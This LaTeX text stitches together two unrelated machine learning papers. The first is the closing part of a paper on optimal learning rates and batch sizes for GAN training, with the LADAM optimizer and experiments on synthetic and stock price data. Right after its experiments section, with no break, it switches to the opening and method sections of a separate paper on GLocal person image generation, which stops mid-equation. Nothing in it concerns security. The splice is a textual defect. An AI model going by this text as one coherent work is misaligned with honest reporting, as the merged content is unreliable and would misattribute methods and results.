where $m^\theta$ controls the generator batch size and $m^{\max}$ is an upper bound representing the maximum batch size.
\item When $v \in \mathcal{C}^{1,2}([0,T],\mathbb{R}^M \times \mathbb{R}^N)$, the optimal control $\bar{m}^\theta$ is given by
\begin{align*}
\bar{m}^\theta(t) = \left\{
\begin{array}{ll}
1 \vee \left( m^{*}(t) \wedge m^{\max}\right), & \text{if }\, \left( (\bar{\Sigma}^w:v_{ww}) + (\bar{\Sigma}^\theta:v_{\theta \theta}) \right) \big(t,q(t)\big) > 0, \\
\\
m^{\max}, & \text{if } \, \big| \big( m^{\max} \big)^{-1} - \big( m^{*}(t) \big)^{-1} \big| \geq \big| 1 - \big( m^{*}(t) \big)^{-1} \big|,\\
\\
1, & \text{otherwise,}\\
\end{array}
\right.
\end{align*}
with $m^{*}(t) = \left( \cfrac{ (\bar{\Sigma}^w:v_{ww}) + (\bar{\Sigma}^\theta:v_{\theta \theta}) }{ g_{w}^\top v_w - g_{\theta}^\top v_\theta } \right) \big(t,q(t)\big)$.
\end{itemize}
\label{Prop:OptiBS}
\end{prop}
The proof of Proposition \ref{Prop:OptiBS} is omitted since it is very similar to the one of Proposition \ref{Prop:OptiLR}.
\paragraph{Some remarks.} We observe that
\begin{itemize}
\item Proposition \ref{Prop:OptiBS}, in the same spirit as Proposition \ref{Prop:OptiLR}, suggests a two-step approach for the implementation of the optimal batch size. First, estimate $\bar{m}^\theta$ using Equation \eqref{Eq:HJB_BS_prop}. Second, apply the gradient algorithm with $\bar{m}^\theta$.
\item The expression of the optimal batch size is given under the regularity condition $v \in \mathcal{C}^{1,2}([0,T],\mathbb{R}^M \times \mathbb{R}^N)$. It is possible to show that this regularity holds when $g$ and the volatility $\bar{\sigma}$ satisfy simple Lipschitz continuity conditions (see \citep{evans1983classical} for more details). Finally, when $v$ does not satisfy this regularity assumption, it is standard to use discrete-time approximations (see Section \ref{sec:OptLearningRate} for more details).
\item The convexity term $(\bar{\Sigma}^w:v_{ww}) + (\bar{\Sigma}^\theta:v_{\theta \theta})$ involved in the expression of $\bar{m}^\theta$ aggregates the discriminator component $(\bar{\Sigma}^w:v_{ww})$ and the generator one $(\bar{\Sigma}^\theta:v_{\theta \theta})$. Moreover, the clipping parameters $1$ and $m^{\max}$ are used to prevent either gradient explosion or vanishing gradients.
\end{itemize}
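To make the selection rule concrete, the clipped optimal batch size above can be sketched in a few lines. The function below evaluates both branches given the pre-computed convexity term $(\bar{\Sigma}^w:v_{ww}) + (\bar{\Sigma}^\theta:v_{\theta\theta})$, the directional term $g_w^\top v_w - g_\theta^\top v_\theta$, and the cap $m^{\max}$; all names are illustrative and not taken from the paper's code.

```python
def optimal_batch_size(convexity, directional_term, m_max):
    """Clipped optimal batch size rule (sketch of the proposition's selection).

    convexity        : (Sigma^w : v_ww) + (Sigma^theta : v_theta_theta) at (t, q(t))
    directional_term : g_w^T v_w - g_theta^T v_theta at (t, q(t))
    m_max            : maximum allowed batch size
    """
    m_star = convexity / directional_term
    if convexity > 0:
        # 1 v (m* ^ m_max): clip m* between 1 and m_max
        return float(max(1.0, min(m_star, m_max)))
    # otherwise compare the inverse distances as in the proposition
    if abs(1.0 / m_max - 1.0 / m_star) >= abs(1.0 - 1.0 / m_star):
        return float(m_max)
    return 1.0
```

In a training loop, $m^{*}(t)$ would be re-evaluated at each step from the current estimate of $v$.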
\section{Numerical Experiment}
\label{sec:Exp}
In this section, we compare a well-known and established algorithm, the ADAM optimizer, with its adaptive learning rate counterpart which we call LADAM. The implementation of the adaptive learning rate is detailed in Section \ref{lrAlgoDesign}. We use three numerical examples to compare the convergence speed of these algorithms: generation of Gaussian distributions, generation of Student t-distributions, and financial time series generation.
\subsection{Optimizer Design}
\manuallabel{lrAlgoDesign}{6.1}
For computational efficiency, instead of directly applying the two-step resolution scheme introduced in Section \ref{sec:OptLearningRate} to the high-dimensional Isaacs-Bellman equation, we exploit the connection between the optimal learning rate and Newton's algorithm by following the methodology illustrated in Equation \eqref{Eq:ConnecNewtAlgo}. The main idea is to approximate the function $v$, introduced in Equation \eqref{Eq:ValFunctDef}, by $g$.\\
Furthermore, we divide all the parameters into $M$ sets. For example, for neural networks, one may associate a unique set to each layer of the network. For each set $i$, denote by $x^i_t$ the value at iteration $t \in \mathbb{N}$ of the set's parameters and write $g_{x^i}$ for the gradient of the loss $g$ with respect to the parameters of the set $i$. Then, we replace for each set $i$ the update rule
\begin{equation*}
x^i_{t+1} = x^i_{t} - \bar{\eta}_t g_{x^i}(x^i_{t}) ,
\end{equation*}
with $\bar{\eta}_t$ a base reference learning rate that depends on the optimizer, by the following update rule:
\begin{equation*}
x^i_{t+1} = x^i_t - u^i_t \big(\bar{\eta}_t g_{x^i}(x^i_{t}) \big),
\end{equation*}
where the adjustment $u^i_t$, derived from Proposition \ref{Prop:OptiLR}, is defined as follows:
$$ u^i_t = u^{\min} \vee \left( \cfrac{\|g_{x^i}(x^i_{t})\|^2}{{\text{Tr}}[(\bar{g}_{x^i} \bar{g}_{x^i}^\top) g_{x^ix^i}](x^i_{t})} \wedge u^{\max} \right)
$$
if $\big({\text{Tr}}[( \bar{g}_{x^i} \bar{g}_{x^i}^\top ) g_{x^ix^i}]\big)(x^i_{t}) > 0$;
otherwise
$u^i_t= u^{\max}$.
Here $\bar{g}_{x^i} = \sqrt{\bar{\eta}_t} g_{x^i}$ and $u^{\max}$ (resp. $u^{\min}$) is the maximum (resp. minimum) allowed adjustment. Note that the same adjustment $u^i_t$ is used for all parameters of the set $i$. The most expensive operation here is the computation of the term $\big({\text{Tr}}[(\bar{g}_{x^i} \bar{g}_{x^i}^\top) g_{x^ix^i}]\big)(x^i_{t})$ since we need to approximate the Hessian matrix $g_{x^ix^i}$.
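As a minimal sketch (names, defaults, and the dense-Hessian input are ours, not the paper's implementation), the adjustment $u^i_t$ for one parameter set can be computed as:

```python
import numpy as np

def lr_adjustment(grad, hessian, base_lr, u_min=0.1, u_max=10.0):
    """Per-set learning-rate adjustment u_t^i from the rule above.

    grad    : gradient g_{x^i} at the current iterate, shape (n,)
    hessian : approximation of the Hessian g_{x^i x^i}, shape (n, n)
    """
    g_bar = np.sqrt(base_lr) * grad                      # \bar g = sqrt(eta) * g
    denom = np.trace(np.outer(g_bar, g_bar) @ hessian)   # Tr[(g_bar g_bar^T) H]
    if denom > 0:
        ratio = float(np.dot(grad, grad)) / denom
        return float(np.clip(ratio, u_min, u_max))       # u_min v ratio ^ u_max
    return u_max                                         # non-convex direction
```

In practice the Hessian would be replaced by a cheaper approximation (e.g., via Hessian-vector products), since forming $g_{x^ix^i}$ explicitly is the dominant cost noted above.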
\subsection{Vanilla GANs Revisited}
We use the vanilla GANs in Section \ref{sec:GAN_wellpos} to show the relevance of our adaptive learning rate and the influence of the batch size on GANs training.
\paragraph{Data.} The numerical samples of $X$ are drawn either from the Gaussian distribution $N(m,\sigma^2)$ with $(m,\sigma) = (3,1)$ or the translated Student t-distribution $a + T(n)$ where $a = 3$, and $T(n)$ is a standard Student t-distribution with $n$ degrees of freedom. The noise $Z$ always follows $N(0,1)$. These samples are then decomposed into two sets: a training set and a test set. In the experiment, one epoch refers to the number of gradient updates needed to pass the entire training dataset. \\
At the end of the training, the discriminator accuracy is expected to be around $50\%$, meaning that the generator manages to produce samples that fool the discriminator, which is then unable to differentiate the original data from the fake ones.
\paragraph{Network architecture description.} We work here under the same setting as Section \ref{sec:GAN_wellpos}, with the discriminator detailed in Equation \eqref{Eq:simple_model}, while the generator is composed of two layers: the first layer is linear, and the second one is convolutional. Both layers use the ReLU activation function.
\subsubsection{Gaussian Distribution Generation}
\manuallabel{numres}{6.2.1}
Here the input samples $X$ are drawn from $N(3,1)$. We first compare the accuracy of the discriminator for two choices of optimizer, namely the standard ADAM optimizer and the ADAM optimizer with adaptive learning rates (i.e., LADAM). Figure \ref{Fig:Plot_accuracy_discriminator_sgdlsgd} plots the accuracy of the discriminator when the base learning rate varies for ADAM and LADAM. Evidently, a bigger learning rate yields faster convergence for both optimizers; LADAM outperforms ADAM due to the introduction of the adaptive learning rate, and more importantly, LADAM's performance is more robust with respect to the initial learning rate since it can adjust using the additional adaptive component.
\begin{figure}[h!]
\center
(a) Discriminator accuracy ADAM \hspace{1.5cm} (b) Discriminator accuracy LADAM \\
\includegraphics[width=0.45\textwidth]{readf_res_gan_allrun4_adam_lrvary_sameGrid.pdf}
\includegraphics[width=0.45\textwidth]{readf_res_gan_allrun4_ladam_lrvary_sameGrid.pdf}
\caption{Discriminator accuracy for ADAM with a base learning rate in (a) and LADAM with an adaptive learning rate in (b)}
\label{Fig:Plot_accuracy_discriminator_sgdlsgd}
\end{figure}
Next, we analyze the generator loss for the ADAM and LADAM optimizers. Figure \ref{Fig:Plot_loss_generator_sgdlsgd} shows the variations of the generator loss when varying the base learning rate for these optimizers. First, one can see that the loss decreases faster when using LADAM. Second, Figure \ref{Fig:Plot_loss_generator_sgdlsgd} confirms the robustness of LADAM with respect to the choice of the initial learning rate, again thanks to the additional adaptive learning rate component.
\begin{figure}[h!]
\center
(a) Generator loss ADAM \hspace{1.5cm} (b) Generator loss LADAM \\
\includegraphics[width=0.45\textwidth]{readf_res_gan_allrun4_adam_gloss_lrvary_sameGrid.pdf} \includegraphics[width=0.45\textwidth]{readf_res_gan_allrun4_ladam_gloss_lrvary_sameGrid.pdf}
\caption{Generator loss for ADAM with a base learning rate in (a) and LADAM with an adaptive learning rate in (b).}
\label{Fig:Plot_loss_generator_sgdlsgd}
\end{figure}
\subsubsection{Student t-Distribution Generation}
We repeat the same experiments as in Section \ref{numres} but with different input data. Here, the input samples $X$ are drawn from the translated Student t-distribution $3 + T(3)$, where $T(3)$ is a standard Student t-distribution with $3$ degrees of freedom. Figures \ref{Fig:Plot_accuracy_discriminator_sgdlsgdStudent} and \ref{Fig:Plot_loss_generator_sgdlsgdStudent} display the discriminator accuracy and generator loss for both ADAM and LADAM. One can see that the conclusions of Section \ref{numres} still hold, namely LADAM offers better performance and is more robust with respect to the choice of the initial learning rate.
\begin{figure}[h!]
\center
(a) Discriminator accuracy ADAM \hspace{1.5cm} (b) Discriminator accuracy LADAM \\
\includegraphics[width=0.45\textwidth]{AccDiscrimLrvaryAllSameGrid.pdf}
\includegraphics[width=0.45\textwidth]{AccDiscrimLrvaryAllSameGridLadam.pdf}
\caption{Discriminator accuracy for ADAM with a base learning rate in (a) and LADAM with an additional adaptive learning rate component in (b).}
\label{Fig:Plot_accuracy_discriminator_sgdlsgdStudent}
\end{figure}
\begin{figure}[h!]
\center
(a) Generator loss ADAM \hspace{1.5cm} (b) Generator loss LADAM \\
\includegraphics[width=0.45\textwidth]{GlossLrvaryAllSameGrid.pdf} \includegraphics[width=0.45\textwidth]{GlossLrvaryAllSameGridLadam.pdf}
\caption{Generator loss for ADAM with a base learning rate in (a) and LADAM with an additional adaptive learning rate component in (b).}
\label{Fig:Plot_loss_generator_sgdlsgdStudent}
\end{figure}
\subsection{Financial Time Series Generation}
\paragraph{Data.} The data used here is taken from the Quandl Wiki Prices database, which offers stock prices, dividends, and splits for 3000 US publicly-traded companies. In the numerical analysis, we focus on the following six stocks: Boeing, Caterpillar, Walt Disney, General Electric, IBM, and Coca-Cola. For each stock, key quantities such as the traded volume and the open and close prices are recorded daily. The studied time period runs from January 2000 to March 2018.
\paragraph{Network architecture description.} The neural network architecture is borrowed from \citep{yoon2019time}. It consists of four network components: an embedding function, a recovery function, a sequence generator, and a sequence discriminator. The key idea is to jointly train the auto-encoding components (i.e., the embedding and the recovery functions) with the adversarial components (i.e., the discriminator and the generator networks) in order to learn how to encode features and to generate data at the same time.
\paragraph{Numerical results.} Figure \ref{Fig:Plot_loss_generator_acc_discrim_TimeGan} plots the discriminator accuracy for the following two optimizers: the standard ADAM optimizer, and the same ADAM optimizer with an adaptive learning rate, which we call LADAM. We fix the base learning rate here to $5 \cdot 10^{-4}$ since the best performance for ADAM is obtained with this value.\\
Figure \ref{Fig:Plot_loss_generator_acc_discrim_TimeGan} clearly shows that both the accuracy and the loss of LADAM converge faster than those of ADAM. This is mainly due to the adaptive learning rate component, which controls how fast the algorithm moves in the gradient direction. Moreover, Figure \ref{Fig:Plot_loss_generator_acc_discrim_TimeGan}.b reveals that the loss from LADAM is more stable (i.e., with fewer fluctuations) than that from ADAM. Such behavior is expected since LADAM incorporates the convexity of the loss function in its choice of the learning rate.
\begin{figure}[h!]
\center
\hspace{-2.cm} (a) Discriminator accuracy \hspace{1.5cm} (b) Generator loss \\
\includegraphics[width=0.45\textwidth]{Final_DAcc_0011.pdf} \includegraphics[width=0.45\textwidth]{Final_GLossS_0011.pdf}
\caption{Discriminator accuracy for ADAM and LADAM in (a), and generator loss for ADAM and LADAM in (b).}
\label{Fig:Plot_loss_generator_acc_discrim_TimeGan}
\end{figure}
\newpage
\section{Introduction}
\noindent Person image generation aims to generate a realistic person image in a target pose while keeping the source appearance unchanged; it is a popular task in the computer vision community with applications such as image editing and image animation. Perennial research efforts have contributed to impressive performance gains on challenging benchmarks. \\
\indent Essentially, person image generation involves the deformation of the human body in 3D space, which poses an ill-posed problem given just the 2D image and pose inputs. The limitations of 2D modeling lead to tough challenges due to the following difficulties: (i) predicting parts that are invisible in the source due to occlusion or corruption, as shown in Figure~\ref{fig:overview}, and (ii) retaining the spatial structure of the visible source texture. The exploration of these issues has contributed to the development and progress of this field.\\
\indent Existing works like~\cite{ma2017pose,pumarola2018unsupervised,chan2019everybody} propose solutions within the common image-to-image translation framework, directly feeding the conditioning pose and human image as encoder-decoder inputs. They are thus unable to exploit the appearance correspondence between the input and the target image. To achieve a better rearrangement of the source appearance, warping-based methods~\cite{dong2018soft, siarohin2018deformable,tang2021structure, li2019dense,liu2019liquid,ren2020deep} have been proposed. However, these operations struggle to recover structural details by relying solely on a point-wise mapping, and they break down on unmatched occluded regions. Recent works~\cite{men2020controllable, zhang2021pise} apply semantic normalization techniques such as AdaIN~\cite{men2020controllable} and SEAN~\cite{zhu2020sean} to restore semantic details in the target. However, treating the occluded and non-occluded regions indiscriminately introduces misleading information, and the capability of these techniques to preserve structural details is not fully exploited.\\
\indent This paper presents \textbf{GLocal}, a scheme that preserves semantic and structural information with \textbf{G}lobal Graph Reasoning (GGR) and \textbf{Local} Structure Transfer (LST), respectively. Inspired by the fact that visible areas can facilitate the estimation of invisible ones (e.g., if the hand is unseen in the source image, its color can still be estimated from the neck skin), we estimate the style of occluded regions by modeling the internal relationships among different semantic regions. The relationships are built with a graph architecture based on the linkage of body parts, whose graph nodes are filled with per-region styles. Thereby, the style representation of an invisible area can be inferred by our GGR. After acquiring the global statistics of the source, we seek to reproduce the source's local structure with LST, since local structure indicates how image details are organized and is more informative than isolated points. We achieve this by predicting style parameters of the source from a local correlation map and transferring the structural information of the source style to the generation features with LocConv. Our contributions can be summarized as follows:
\begin{itemize}
\item We propose the GGR module to estimate occluded-region styles with global reasoning in person image generation, conveying visible style information to invisible areas along a graph structured according to the connectivity of the human body.
\item We design the LST module to extract local structure and transfer it to the generated result, which sharpens the generation and leads to better detail preservation.
\item Extensive experiments show that our method achieves superior performance on the challenging DeepFashion dataset both qualitatively and quantitatively.
\end{itemize}
\begin{figure*}[t]
\centering
\includegraphics[width=0.9\linewidth]{figs/framework.pdf}
\caption{An overview of our GLocal framework. We first predict the target segmentation map $S_g$ from Semantic Prediction. Then we obtain the \textit{warping flow} $W$ and the \textit{visibility map} $m_{vis}$ from a pretrained 3D flow estimation network~\cite{li2019dense}. We mark the visible and invisible positions in $m_{vis}$ with green and red, respectively. After fusing the encoded target and warped source features, we can inject the source style into the relevant regions precisely within the GGR module. Finally, in the LST module, we transfer the local structure from the source to the generated result and send it into the decoder to reconstruct the final image.}
\label{fig:framework}
\end{figure*}
\section{Related Work}
\subsection{Person Image Generation}
Person image generation is a valuable branch of the mainstream image generation field, focusing on human-specific generation tasks. As a milestone, \cite{ma2017pose} first shows that a conditional GAN (cGAN) can generate desired person images. Extending this idea, several following works seek to improve the cGAN's performance with techniques such as unsupervised training~\cite{pumarola2018unsupervised}, cycle training~\cite{tang2020bipartite}, a coarse-to-fine strategy~\cite{wei2020gac}, and progressive training~\cite{zhu2019progressive,liu2020pose}. However, these methods ignore the vanilla conditional GAN's inability to model correspondences under large pose misalignment. To better achieve spatial rearrangement, \cite{siarohin2018deformable} decomposes the translation between different poses into local affine transformations. Approaches such as~\cite{li2019dense, Wei_Xu_Shen_Huang_2021, Tang_Yuan_Shao_Liu_Wang_Zhou_2021, liu2019liquid, ren2020deep} turn to estimating the appearance flow to align the source appearance with the target. Although warping the source can alleviate the aforementioned problem, these methods cannot handle occluded-region estimation due to their false assumption that a pixel-to-pixel warping transformation exists between source and target. Recently, emerging modulation-based methods~\cite{zhang2021pise, lv2021learning} adopt a two-stage pipeline, which first predicts the segmentation map to extract region-wise image styles, and then uses them to guide region synthesis with corresponding style injection. Unfortunately, this strategy cannot extract appropriate styles for occluded regions, and thus still fails to synthesize them. Different from previous methods, our global graph reasoning module can mitigate the occluded texture generation issue and achieve better structural preservation of the source in the target.
\subsection{Semantic Image Generation}
Conditioned on a semantic segmentation map, semantic image generation is a special form of general image generation, whose solution is commonly based on style control. Style is mainly defined as a statistical property of the image feature, which can be spatially varying~\cite{park2019semantic}, region adaptive~\cite{zhu2020sean}, or class specific~\cite{tan2021effi,tan2021diverse}. To transfer the style from one image to another, these methods model the style as modulation scale/shift parameters. Specifically, SPADE~\cite{park2019semantic} predicts spatially-varying affine parameters that modulate reference image features at different locations, obtaining more dedicated style injection and high-fidelity generation results. Later, SEAN~\cite{zhu2020sean} enforces per-region style extraction and modulation. Our method stems from this scheme and injects the desired style based on whether a region is occluded or not, which achieves more precise semantic manipulation.
\section{Method}
\subsection{Overview}
We propose a novel framework, GLocal, for person image generation, which is divided into three stages: semantic prediction, global graph reasoning, and local structure transfer. As shown in Figure~\ref{fig:framework}, the semantic prediction network supplies the semantic layout for per-region style extraction and injection in the global graph reasoning stage. The local structure transfer module further controls the generation process by modeling and transferring local structure.
\subsubsection{Preliminary}
To align the source feature $F_s$ with the target $F_t$ and supply visibility guidance, we adopt Intr-Flow~\cite{li2019dense} to learn the appearance warping flow $W$ and the visibility map $m_{vis}$ by matching a 3D human body model. The visibility map indicates, for each source position, whether it is visible in the target.
\subsection{Semantic Prediction}
Directly generating a person image solely from the target pose map involves estimating both the human semantics and the body details, which is troublesome since they are highly related to each other. To simplify the overall generation process, we turn to generating the target semantic map first, which is easier to estimate and provides semantic assistance for the subsequent texture detail completion.\\
\indent Our semantic prediction network adopts the vanilla pix2pix~\cite{isola2017image} architecture, which takes the source image ${I}_s$, the source pose map ${P}_s$, and the target pose map ${P}_t$ as inputs. The semantic map consists of 8 semantic classes, some of which occupy large areas and comprise the majority of the loss, leading to inefficient learning for small parts (e.g., shoes). Considering this, we propose to utilize the focal loss~\cite{lin2017focal} to alleviate the class imbalance problem. Mathematically, the focal loss for class-balanced semantic prediction is formulated as:
\begin{equation}
\mathcal{L}_{\mathrm{S}_g}=-\left(1-p_{t}\right)^{\eta} \log \left(p_{t}\right), p_{t}=
\left\{
\begin{aligned}
\mathrm{S}_g, & \text { when } \mathrm{S}_t=1 \\
1-\mathrm{S}_g, & \text { when } \mathrm{S}_t=0
\end{aligned}
\right.
\end{equation}
where $\mathrm{S}_t \in\{1,0\} $ specifies the ground-truth target segmentation map and $\mathrm{S}_g \in [0,1]$ denotes the predicted probability for the class with label $\mathrm{S}_t=1$. $\eta$ acts as the tunable focusing parameter and thus the scaling factor $\left(1-p_{t}\right)^{\eta}$ can effectively focus on the hard classes, e.g. shoes or hands.
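A minimal NumPy sketch of this class-balanced objective in its binary form (function and argument names are ours):

```python
import numpy as np

def focal_loss(probs, targets, eta=2.0):
    """Binary focal loss with focusing parameter eta.

    probs   : predicted probabilities S_g for the positive class, in (0, 1)
    targets : ground-truth labels S_t in {0, 1}
    """
    probs = np.asarray(probs, dtype=float)
    targets = np.asarray(targets, dtype=float)
    p_t = np.where(targets == 1, probs, 1.0 - probs)   # p_t as in the equation
    return float(np.mean(-((1.0 - p_t) ** eta) * np.log(p_t)))
```

With $\eta=0$ this reduces to the usual cross-entropy; increasing $\eta$ down-weights well-classified (easy) pixels so that hard classes such as shoes contribute relatively more.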
\begin{figure*}[t]
\centering
\includegraphics[width=0.95\linewidth]{figs/RGN.pdf}
\caption{Architecture of our GGR (Global Graph Reasoning) module.}
\label{fig:rgn}
\end{figure*}
\subsection{Global Graph Reasoning}
\label{sec:ggr}
As exemplified in Figure~\ref{fig:rgn}, to extract the style codes of the source for each region, we perform per-region average pooling on the encoded source features according to the source segmentation map $S_s$ and obtain the source's style code $ST \in R^{N \times 512}$, where $N$ denotes the number of semantic regions. To distinguish the occluded and non-occluded areas of each region, we calculate the occlusion map $m_{oc}$ from the predicted $S_g$ and the visibility map $m_{vis}$ by element-wise product. For the \textit{non-occluded} area, we inject each style into the corresponding region. Then we perform per-style convolution and broadcast the convolved style codes to the target regions. However, for the \textit{occluded} area, directly generating with the corresponding source region's style information may introduce implausible results. Thus we need to supply a more accurate style representation for occluded area estimation via global style reasoning.
\subsubsection{Graph Modeling for Source Styles}
\indent Since some body parts generally share similar appearance characteristics (e.g., the neck and the hand are highly analogous in color), it is natural to aid occlusion estimation with global graph style propagation along the human body structure. Given the encoded source style codes, we construct a relation graph with region-wise style codes as graph nodes and the natural connectivities of the human body structure as edges. The style feature nodes can then be recurrently updated via graph propagation. Specifically, we construct a spatial graph $G=(V, E)$ on the $N$ regions to capture the inter-region connections, where the node set $V=\left\{v_{i} \mid i=1, \ldots, N \right\}$ represents all per-region style vectors. These nodes are connected with edges $E=\left\{v_{i} v_{j}\right\}$ according to the connectivity of the human body structure. Then we perform spatial graph convolution to propagate the style information. The graph-convolved node value at $v_i$ can be written as:
\begin{equation}
{ST}_{oc}\left(v_{i}\right)=\sum_{v_{j} \in B\left(v_{i}\right)} \frac{1}{Z_i\left(v_ j\right)} {ST}\left(\mathbf{p}\left(v_i, v_ j\right)\right) \cdot \mathbf{w}\left(v_i, v_j\right)
\end{equation}
where the sampling function $\mathbf{p}: B\left(v_i\right) \rightarrow V$ is defined on the neighbor set $B\left(v_ i\right)= \left\{v_j \mid d\left(v_j, v_i\right) \leq D\right\}$ of node $v_i$, and $D$ is set to 1. The weighting function $\mathbf{w}\left(v_i, v_j\right)$ in the graph convolution allocates a specific weighting value to each sampled node according to the subset it belongs to, unlike 2D convolution, which convolves pixels in a fixed square order. As illustrated in Figure~\ref{fig:graph}, we divide the neighbor set $B\left(v_i\right)$ of node $v_i$ into three subsets by centrifugal distance comparison. The mapping from nodes to subset labels is defined as:
\begin{equation}
r_{i}\left(v_j\right)=\left\{\begin{array}{ll}
0 & \text { if } e_{j}=e_{i} \\
1 & \text { if } e_{j}<e_{i} \\
2 & \text { if } e_{j}>e_{i}
\end{array}\right.
\end{equation}
where $e_i$ denotes the average distance from the gravity center to node $i$. The convolution product of each subset is normalized by the balance term $Z_i\left(v_j\right)=\mid\left\{v_k \mid r_ i\left(v_k\right)=\right.\left.r_i\left(v_j\right)\right\} \mid$. \\
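A toy sketch of one propagation step over the style nodes, with fixed per-subset weights standing in for the learned $\mathbf{w}$ (everything here, including the weights, is illustrative):

```python
import numpy as np

def graph_style_propagation(styles, edges, e):
    """One step of style propagation over the body-part graph (simplified).

    styles : (N, C) per-region style codes (the graph nodes)
    edges  : list of undirected (i, j) body connections
    e      : (N,) distance of each part from the body's gravity center,
             used to split neighbors into 3 subsets (root / closer / farther)
    """
    N, C = styles.shape
    # Per-subset weights (learned in the real model; fixed here for the sketch)
    W = {0: np.eye(C), 1: 0.5 * np.eye(C), 2: 0.5 * np.eye(C)}
    neigh = {i: [i] for i in range(N)}          # D=1 neighborhood includes self
    for i, j in edges:
        neigh[i].append(j)
        neigh[j].append(i)
    out = np.zeros_like(styles)
    for i in range(N):
        labels = [0 if e[j] == e[i] else (1 if e[j] < e[i] else 2)
                  for j in neigh[i]]
        for j, r in zip(neigh[i], labels):
            Z = labels.count(r)                 # cardinality balance term Z_i
            out[i] += styles[j] @ W[r] / Z
    return out
```

In the full module this update runs over the body-part graph so that, e.g., a visible neck node can contribute its skin style to an occluded hand node.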
\indent After reasoning about the occluded area with the style-code graph, we can advance to the generation of the conditioning feature map, whose occluded regions are now filled with globally reasoned source style features. By performing convolution and broadcasting on the conditional feature map, we obtain two sets of spatially-varying modulation parameters $\gamma$ and $\beta$. They act as the scale and bias that modulate the normalized feature map $F_{I}$ to obtain $F_{o}$.
\begin{equation}
F_{o} = \gamma \times \textbf{BN}(F_{I}) + \beta
\end{equation}
\subsection{Local Structure Transfer}
The GGR module can only capture the global statistics of the source, so localized structure cannot be effectively preserved from source to target. As shown in Figure~\ref{fig:lsc}, to transfer the local structural context, we first compute the local correlation map ${F}_{c}$, which models the local structure with a self-correlation layer. Then we predict the full convolution kernels $f$ and biases $b$, since such kernels better distill the local spatial structure. After aligning these parameters with the target via optimal transport, we perform LocConv to transfer the local structure of the source to the generation activations by convolving the normalized target features.
\subsubsection{Modeling Local Structure}
Intuitively, the local structure of a feature map can be represented by the adjoining patch correlation patterns (i.e., the relationship of one patch with its neighbors). In light of this, we extract the local structural representation of the source features with a self-correlation layer that performs multiplicative patch comparisons around each source position. Formally, given the source feature map ${F}_{s} \in \mathbb{R}^{c \times H \times W}$, our self-correlation layer calculates the correlation of two patches centered at $i$ and its neighbors $j \in \mathcal{N}(i)$ via vector products, which is defined as
\begin{equation}
\setlength{\abovedisplayskip}{5pt}
\setlength{\belowdisplayskip}{5pt}
\begin{aligned}
c({i},j) &= \mkern-18mu \sum_{{p} \in [-r,r] \times [-r,r] } \mkern-36mu\langle{F}_s(i+{p}),{F}_s(j+{p})\rangle\\
{F}_{c}(i) &= \mathop{Concat}\limits_{j \in \mathcal{N}(i) }({c(i,j)}), \vert\vert i - j \vert\vert \leq d
\end{aligned}
\label{eq:patch_correlation}
\end{equation}
where $Concat$ denotes channel-wise concatenation. Note that, for computational reasons, we only compute the self-correlation $c(i,j)$ for neighbors whose distance from $i$ is less than $d$. After correlating the positions around $i$, we concatenate the correlations along the channel dimension to get the local structure representation ${F}_{c}\in \mathbb{R}^{(2d+1)^2 \times H \times W}$.
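A slow but direct reference sketch of this self-correlation layer (shapes and names are ours; a real implementation would vectorize the patch comparisons):

```python
import numpy as np

def self_correlation(F, r=1, d=1):
    """Local self-correlation map F_c of a feature map.

    F : (C, H, W) source feature map
    r : patch radius for the multiplicative patch comparison
    d : max displacement to neighbors; output has (2d+1)^2 channels
    """
    C, H, W = F.shape
    pad = r + d
    Fp = np.pad(F, ((0, 0), (pad, pad), (pad, pad)))   # zero padding
    out = np.zeros(((2 * d + 1) ** 2, H, W))
    displacements = [(dy, dx) for dy in range(-d, d + 1)
                     for dx in range(-d, d + 1)]
    for k, (dy, dx) in enumerate(displacements):
        for y in range(H):
            for x in range(W):
                cy, cx = y + pad, x + pad              # center patch position
                ny, nx = cy + dy, cx + dx              # neighbor patch position
                pi = Fp[:, cy - r:cy + r + 1, cx - r:cx + r + 1]
                pj = Fp[:, ny - r:ny + r + 1, nx - r:nx + r + 1]
                out[k, y, x] = np.sum(pi * pj)         # c(i, j)
    return out
```

For $d=1$ the output has $9$ channels per position, one per displacement $(dy, dx)$.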
\begin{figure}[t]
\begin{center}
\setlength{\tabcolsep}{0.03cm}
\renewcommand{\arraystretch}{0.5}
\begin{tabular}{c}
{\includegraphics[width=0.8\linewidth]{./figs/graph.pdf}}
\end{tabular}
\end{center}
\caption{The illustration of the node division strategy in our graph convolution. (a) The red dot represents the node where the convolution takes place, and the nodes within the receptive field are enclosed by a dotted line. (b) The neighbors are divided into three subsets 0, 1 and 2 according to their distance from the gravity center (black node).}
\label{fig:graph}
\end{figure}
\begin{figure}[t]
\begin{center}
\includegraphics[width=0.95\linewidth]{figs/LSC.pdf}
\end{center}
\caption{Architecture of LST (Local Structure Transfer) module.}
\label{fig:lsc}
\end{figure}
To better distill the local structure statistics and assist the structural transfer, we predict the spatially- and channel-varying modulation values, including the 3D filter ${f} \in \mathbb{R}^{H \times W \times c \times (k \times k)}$ and the bias ${b} \in \mathbb{R}^{H \times W \times c \times 1 }$, from the local structure representation ${F}_{c}$ via point-wise convolutions.
\subsubsection{Modulation Parameters Alignment}
To further align the modulation parameters with the target, we introduce the Unbalanced Optimal Transport (UOT)~\cite{zhan2021unbalanced} mechanism to match the encoded source $F_s$ and the generation features $F_{o}$ via a calculated transport plan ($TP$). To define the optimal transport problem, which aims to transform one collection of masses into another, we write the masses of the source and generated features in Dirac form: $\alpha=\sum_{i=1}^{n} \alpha_{i} \delta_{s_{i}}$ and $\beta=\sum_{i=1}^{n} \beta_{i} \delta_{{o}_{i}}$, where $s_i$ and ${o}_i$ denote the positions of $\alpha_i$ and $\beta_i$ in $F_s$ and $F_o$, respectively. Then the optimal transport problem can be formulated as:
\begin{equation}
\begin{split}
& OT(\alpha,\beta) = \mathop{\min}\limits_{TP} (\sum_{i,j=1}^{n} {TP}_{ij}C_{ij}) = \mathop{\min}\limits_{TP} \langle C, TP \rangle \\
&{\rm subject \ to} \quad (TP \vec{1}) = \alpha, \quad (TP^\top \vec{1}) = \beta \\
\end{split}
\label{formula_ot}
\end{equation}
where the cost matrix $C$ is formulated as $C_{i j}=1-\frac{s_{i}^{\top} \cdot {o}_{j}}{\left\|s_{i}\right\|\left\|{o}_{j}\right\|}$, giving the cost of moving mass $\alpha_i$ to $\beta_j$. $TP$ denotes the transport plan, each element $TP_{i j}$ of which denotes the quantity of mass transported from $\alpha_i$ to $\beta_j$. With the transport plan, we can warp $f$ and $b$ to get the aligned modulation parameters $\hat{f}$ and $\hat{b}$, which is formulated as:
\begin{equation}
